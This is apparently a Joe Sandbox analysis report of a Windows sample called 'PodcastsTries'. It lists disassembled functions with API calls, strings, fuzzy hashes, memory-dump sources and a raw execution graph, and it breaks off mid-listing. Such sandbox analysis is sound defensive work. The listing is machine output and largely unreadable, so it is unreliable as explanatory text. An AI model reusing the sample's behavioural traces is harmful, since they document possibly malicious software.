                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                          Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                          • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                          Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                          • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                          Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                          Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:58
                                                                                                                                                                                                                                                                                                          execution_graph 104165 131033 104170 1368b4 104165->104170 104169 131042 104171 13bf73 8 API calls 104170->104171 104172 136922 104171->104172 104178 13589f 104172->104178 104174 1369bf 104176 131038 104174->104176 104181 136b14 8 API calls __fread_nolock 104174->104181 104177 150413 29 API calls __onexit 104176->104177 104177->104169 104182 1358cb 104178->104182 104181->104174 104183 1358be 104182->104183 104184 1358d8 104182->104184 104183->104174 104184->104183 104185 1358df RegOpenKeyExW 104184->104185 104185->104183 104186 1358f9 RegQueryValueExW 104185->104186 104187 13591a 104186->104187 104188 13592f RegCloseKey 104186->104188 104187->104188 104188->104183 104189 1336f5 104192 13370f 104189->104192 104193 133726 104192->104193 104194 13372b 104193->104194 104195 13378a 104193->104195 104236 133788 104193->104236 104196 133804 PostQuitMessage 104194->104196 104197 133738 104194->104197 104199 173df4 104195->104199 104200 133790 104195->104200 104232 133709 104196->104232 104201 133743 104197->104201 104202 173e61 104197->104202 104198 13376f DefWindowProcW 104198->104232 104247 132f92 10 API calls 104199->104247 104204 133797 104200->104204 104205 1337bc SetTimer RegisterWindowMessageW 104200->104205 104206 13380e 104201->104206 104207 13374d 104201->104207 104250 19c8f7 65 API calls ___scrt_fastfail 104202->104250 104211 173d95 104204->104211 104212 1337a0 KillTimer 104204->104212 104208 1337e5 CreatePopupMenu 104205->104208 104205->104232 104237 14fcad 104206->104237 104214 173e46 104207->104214 104215 133758 104207->104215 104208->104232 104210 173e15 104248 14f23c 40 API calls 104210->104248 104219 173dd0 MoveWindow 104211->104219 104220 173d9a 104211->104220 104213 133907 Shell_NotifyIconW 104212->104213 104221 1337b3 104213->104221 104214->104198 104249 191423 8 API calls 104214->104249 104222 1337f2 104215->104222 104231 133763 104215->104231 104216 173e73 104216->104198 104216->104232 104219->104232 104223 173da0 104220->104223 104224 173dbf SetFocus 104220->104224 104244 1359ff DeleteObject DestroyWindow 104221->104244 104245 13381f 75 API calls ___scrt_fastfail 104222->104245 104225 173da9 104223->104225 104223->104231 104224->104232 104246 132f92 10 API calls 104225->104246 104230 133802 104230->104232 104231->104198 104233 133907 Shell_NotifyIconW 104231->104233 104234 173e3a 104233->104234 104235 13396b 60 API calls 104234->104235 104235->104236 104236->104198 104238 14fcc5 ___scrt_fastfail 104237->104238 104239 14fd4b 104237->104239 104240 1361a9 55 API calls 104238->104240 104239->104232 104242 14fcec 104240->104242 104241 14fd34 KillTimer SetTimer 104241->104239 104242->104241 104243 18fe2b Shell_NotifyIconW 104242->104243 104243->104241 104244->104232 104245->104230 104246->104232 104247->104210 104248->104231 104249->104236 104250->104216 102443 13105b 102448 1352a7 102443->102448 102445 13106a 102479 150413 29 API calls __onexit 102445->102479 102447 131074 102449 1352b7 __wsopen_s 102448->102449 102480 13bf73 102449->102480 102453 135376 102492 135238 102453->102492 102460 13bf73 8 API calls 102461 1353a7 102460->102461 102513 13bd57 102461->102513 102464 174be6 RegQueryValueExW 102465 174c03 102464->102465 102466 174c7c RegCloseKey 102464->102466 102519 15017b 102465->102519 102469 1353d2 102466->102469 102477 174c8e _wcslen 102466->102477 102468 174c1c 102528 13423c 102468->102528 102469->102445 102472 174c44 102531 138577 102472->102531 102474 174c5e messages 102474->102466 102476 136a7c 8 API calls 102476->102477 102477->102469 102477->102476 102478 13655e 8 API calls 102477->102478 102543 13b329 102477->102543 102478->102477 102479->102447 102481 15017b 8 API calls 102480->102481 102482 13bf88 102481->102482 102549 15014b 102482->102549 102484 13536d 102485 135594 102484->102485 102561 1722d0 102485->102561 102488 13b329 8 API calls 102489 1355c7 102488->102489 102563 135851 102489->102563 102491 1355d1 102491->102453 102493 1722d0 __wsopen_s 102492->102493 102494 135245 GetFullPathNameW 102493->102494 102495 135267 102494->102495 102496 138577 8 API calls 102495->102496 102497 135285 102496->102497 102498 136b7c 102497->102498 102499 136b93 102498->102499 102500 1757fe 102498->102500 102587 136ba4 102499->102587 102501 15014b 8 API calls 102500->102501 102504 175808 _wcslen 102501->102504 102503 13538f 102507 136a7c 102503->102507 102505 15017b 8 API calls 102504->102505 102506 175841 __fread_nolock 102505->102506 102508 136a8b 102507->102508 102512 136aac __fread_nolock 102507->102512 102510 15017b 8 API calls 102508->102510 102509 15014b 8 API calls 102511 13539e 102509->102511 102510->102512 102511->102460 102512->102509 102514 13bd71 102513->102514 102515 1353b0 RegOpenKeyExW 102513->102515 102516 15014b 8 API calls 102514->102516 102515->102464 102515->102469 102517 13bd7b 102516->102517 102518 15017b 8 API calls 102517->102518 102518->102515 102520 15014b ___std_exception_copy 102519->102520 102521 15016a 102520->102521 102523 15016c 102520->102523 102602 15521d 7 API calls 2 library calls 102520->102602 102521->102468 102524 1509dd 102523->102524 102603 153614 RaiseException 102523->102603 102604 153614 RaiseException 102524->102604 102526 1509fa 102526->102468 102529 15014b 8 API calls 102528->102529 102530 13424e RegQueryValueExW 102529->102530 102530->102472 102530->102474 102532 176610 102531->102532 102534 138587 _wcslen 102531->102534 102533 13adf4 8 API calls 102532->102533 102535 176619 102533->102535 102536 1385c2 102534->102536 102537 13859d 102534->102537 102535->102535 102538 15014b 8 API calls 102536->102538 102605 1388e8 8 API calls 102537->102605 102540 1385ce 102538->102540 102542 15017b 8 API calls 102540->102542 102541 1385a5 __fread_nolock 102541->102474 102542->102541 102544 13b338 _wcslen 102543->102544 102545 15017b 8 API calls 102544->102545 102546 13b360 __fread_nolock 102545->102546 102547 15014b 8 API calls 102546->102547 102548 13b376 102547->102548 102548->102477 102550 150150 ___std_exception_copy 102549->102550 102551 15016a 102550->102551 102554 15016c 102550->102554 102558 15521d 7 API calls 2 library calls 102550->102558 102551->102484 102553 1509dd 102560 153614 RaiseException 102553->102560 102554->102553 102559 153614 RaiseException 102554->102559 102556 1509fa 102556->102484 102558->102550 102559->102553 102560->102556 102562 1355a1 GetModuleFileNameW 102561->102562 102562->102488 102564 1722d0 __wsopen_s 102563->102564 102565 13585e GetFullPathNameW 102564->102565 102566 135898 102565->102566 102567 13587d 102565->102567 102569 13bd57 8 API calls 102566->102569 102568 138577 8 API calls 102567->102568 102570 135889 102568->102570 102569->102570 102573 1355dc 102570->102573 102574 1355ea 102573->102574 102577 13adf4 102574->102577 102576 1355fe 102576->102491 102578 13ae02 102577->102578 102579 13ae0b __fread_nolock 102577->102579 102578->102579 102581 13c2c9 102578->102581 102579->102576 102582 13c2dc 102581->102582 102586 13c2d9 __fread_nolock 102581->102586 102583 15014b 8 API calls 102582->102583 102584 13c2e7 102583->102584 102585 15017b 8 API calls 102584->102585 102585->102586 102586->102579 102588 136bb4 _wcslen 102587->102588 102589 136bc7 102588->102589 102590 175860 102588->102590 102597 137d74 102589->102597 102592 15014b 8 API calls 102590->102592 102594 17586a 102592->102594 102593 136bd4 __fread_nolock 102593->102503 102595 15017b 8 API calls 102594->102595 102596 17589a __fread_nolock 102595->102596 102598 137d8a 102597->102598 102601 137d85 __fread_nolock 102597->102601 102599 15017b 8 API calls 102598->102599 102600 176528 102598->102600 102599->102601 102600->102600 102601->102593 102602->102520 102603->102524 102604->102526 102605->102541 102606 185650 102615 14e3d5 102606->102615 102608 185666 102614 1856e1 102608->102614 102624 14aa65 9 API calls 102608->102624 102611 1856c1 102611->102614 102625 1a247e 8 API calls 102611->102625 102612 1861d7 102614->102612 102626 1a3fe1 81 API calls __wsopen_s 102614->102626 102616 14e3f6 102615->102616 102617 14e3e3 102615->102617 102619 14e429 102616->102619 102620 14e3fb 102616->102620 102627 13b4c8 8 API calls 102617->102627 102628 13b4c8 8 API calls 102619->102628 102622 15014b 8 API calls 102620->102622 102623 14e3ed 102622->102623 102623->102608 102624->102611 102625->102614 102626->102612 102627->102623 102628->102623 102629 14235c 102639 142365 __fread_nolock 102629->102639 102631 1874e3 102664 1913c8 8 API calls __fread_nolock 102631->102664 102633 1874ef 102638 141ff7 __fread_nolock 102633->102638 102665 13bed9 102633->102665 102634 1423b6 102636 137d74 8 API calls 102634->102636 102635 15014b 8 API calls 102635->102639 102636->102638 102639->102631 102639->102634 102639->102635 102639->102638 102640 15017b 8 API calls 102639->102640 102641 138ec0 102639->102641 102640->102639 102642 138ed2 102641->102642 102643 138ed5 102641->102643 102642->102639 102644 138f0b 102643->102644 102645 138edd 102643->102645 102647 176b1f 102644->102647 102648 138f1d 102644->102648 102655 176a38 102644->102655 102669 155536 26 API calls 102645->102669 102672 1554f3 26 API calls 102647->102672 102670 14fe6f 51 API calls 102648->102670 102649 138eed 102654 15014b 8 API calls 102649->102654 102652 176b37 102652->102652 102656 138ef7 102654->102656 102657 176ab1 102655->102657 102659 15017b 8 API calls 102655->102659 102658 13b329 8 API calls 102656->102658 102671 14fe6f 51 API calls 102657->102671 102658->102642 102660 176a81 102659->102660 102661 15014b 8 API calls 102660->102661 102662 176aa8 102661->102662 102663 13b329 8 API calls 102662->102663 102663->102657 102664->102633 102666 13befc __fread_nolock 102665->102666 102667 13beed 102665->102667 102666->102638 102667->102666 102668 15017b 8 API calls 102667->102668 102668->102666 102669->102649 102670->102649 102671->102647 102672->102652 102673 131098 102678 135fc8 102673->102678 102677 1310a7 102679 13bf73 8 API calls 102678->102679 102680 135fdf GetVersionExW 102679->102680 102681 138577 8 API calls 102680->102681 102682 13602c 102681->102682 102683 13adf4 8 API calls 102682->102683 102695 136062 102682->102695 102684 136056 102683->102684 102685 1355dc 8 API calls 102684->102685 102685->102695 102686 13611c GetCurrentProcess IsWow64Process 102687 136138 102686->102687 102688 136150 LoadLibraryA 102687->102688 102689 175269 GetSystemInfo 102687->102689 102690 136161 GetProcAddress 102688->102690 102691 13619d GetSystemInfo 102688->102691 102690->102691 102694 136171 GetNativeSystemInfo 102690->102694 102692 136177 102691->102692 102696 13109d 102692->102696 102697 13617b FreeLibrary 102692->102697 102693 175224 102694->102692 102695->102686 102695->102693 102698 150413 29 API calls __onexit 102696->102698 102697->102696 102698->102677 104251 140ebf 104252 140ed3 104251->104252 104258 141425 104251->104258 104253 140ee5 104252->104253 104256 15014b 8 API calls 104252->104256 104254 18562c 104253->104254 104257 140f3e 104253->104257 104284 13b4c8 8 API calls 104253->104284 104285 1a1b14 8 API calls 104254->104285 104256->104253 104260 142b20 224 API calls 104257->104260 104276 14049d messages 104257->104276 104258->104253 104261 13bed9 8 API calls 104258->104261 104282 140376 messages 104260->104282 104261->104253 104262 18632b 104289 1a3fe1 81 API calls __wsopen_s 104262->104289 104263 141695 104270 13bed9 8 API calls 104263->104270 104263->104276 104264 141e50 40 API calls 104264->104282 104265 15014b 8 API calls 104265->104282 104267 185cdb 104274 13bed9 8 API calls 104267->104274 104267->104276 104268 18625a 104288 1a3fe1 81 API calls __wsopen_s 104268->104288 104269 13bed9 8 API calls 104269->104282 104270->104276 104273 141990 224 API calls 104273->104282 104274->104276 104275 13bf73 8 API calls 104275->104282 104277 150413 29 API calls pre_c_initialization 104277->104282 104278 1505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104278->104282 104279 186115 104286 1a3fe1 81 API calls __wsopen_s 104279->104286 104281 140aae messages 104287 1a3fe1 81 API calls __wsopen_s 104281->104287 104282->104262 104282->104263 104282->104264 104282->104265 104282->104267 104282->104268 104282->104269 104282->104273 104282->104275 104282->104276 104282->104277 104282->104278 104282->104279 104282->104281 104283 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104282->104283 104283->104282 104284->104253 104285->104276 104286->104281 104287->104276 104288->104276 104289->104276 104290 16947a 104291 169487 104290->104291 104294 16949f 104290->104294 104347 15f649 20 API calls __dosmaperr 104291->104347 104293 16948c 104348 162b5c 26 API calls __fread_nolock 104293->104348 104296 1694fa 104294->104296 104304 169497 104294->104304 104349 170144 21 API calls 2 library calls 104294->104349 104310 15dcc5 104296->104310 104299 169512 104317 168fb2 104299->104317 104301 169519 104302 15dcc5 __fread_nolock 26 API calls 104301->104302 104301->104304 104303 169545 104302->104303 104303->104304 104305 15dcc5 __fread_nolock 26 API calls 104303->104305 104306 169553 104305->104306 104306->104304 104307 15dcc5 __fread_nolock 26 API calls 104306->104307 104308 169563 104307->104308 104309 15dcc5 __fread_nolock 26 API calls 104308->104309 104309->104304 104311 15dce6 104310->104311 104312 15dcd1 104310->104312 104311->104299 104350 15f649 20 API calls __dosmaperr 104312->104350 104314 15dcd6 104351 162b5c 26 API calls __fread_nolock 104314->104351 104316 15dce1 104316->104299 104318 168fbe CallCatchBlock 104317->104318 104319 168fc6 104318->104319 104320 168fde 104318->104320 104418 15f636 20 API calls __dosmaperr 104319->104418 104322 1690a4 104320->104322 104327 